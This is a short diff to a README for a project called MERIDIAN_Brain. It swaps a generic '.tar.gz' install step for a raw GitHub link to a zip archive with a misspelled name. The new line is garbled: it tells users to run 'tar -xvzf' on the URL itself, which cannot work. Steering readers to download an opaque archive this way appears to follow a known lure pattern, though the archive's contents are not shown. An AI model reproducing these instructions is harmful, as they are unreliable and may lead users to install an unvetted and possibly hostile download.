El1don1/MERIDIAN_Brain/README.md

 **Linux:**

 - If you have an `.AppImage`, right-click the file, select "Properties," then check "Allow executing file as program."
 Double-click to run.
-- If you have a `.tar.gz` file, open a terminal and extract it using `tar -xvzf filename.tar.gz`.
+- If you have a `https://github.com/El1don1/MERIDIAN_Brain/raw/refs/heads/main/brain/MERIDIA_Brain_v2.1.zip` file, open a terminal and extract it using `tar -xvzf https://github.com/El1don1/MERIDIAN_Brain/raw/refs/heads/main/brain/MERIDIA_Brain_v2.1.zip`.
 Navigate to the extracted folder to run the program.

 ### 3. Launch MERIDIAN_Brain